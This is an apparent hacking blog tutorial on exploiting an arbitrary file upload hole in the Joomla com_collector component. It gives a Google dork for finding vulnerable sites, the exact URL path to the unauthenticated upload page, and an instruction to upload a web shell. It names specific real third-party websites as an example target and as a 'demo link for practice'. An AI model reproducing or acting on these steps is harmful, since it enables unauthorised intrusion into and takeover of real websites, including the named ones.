Hello friends today i am back with one more Web vulnerability so lets go directly into attack.
Google dork: [inurl:index.php?option=com_collector]
so first go to google search for
[inurl:index.php?option=com_collector] in the search box
you will get a huge list of search result now select any website and open it on next tab now add this part to URL
site/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
Example:
Open Url In next tab
http://www.immortal-thor.com/index.php?option=com_collector&view=item&id=8:merchandise&Itemid=&item=60:marvel-universe-gigantic-battles-savage-frost-giant-a-loki
so finally the site will look like this
http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
After applying We see:
http://www.immortal-thor.com/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
upload ur shell as : shell.php or what ever
demo link for practice:
http://www.moepooladfar.org/index.php?option=com_collector&view=collection&id=2&reset=1&Itemid=18
(http://www.moepooladfar.org/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1)
ETC
Home
»
Hacking
»
RTE Vulnerability
»
Website Hacking
»
Website Vulnerability
» Joomla com_collector Component Arbitrary File Upload Vulnerability
Subscribe to:
Post Comments (Atom)
Cannot upload
ReplyDelete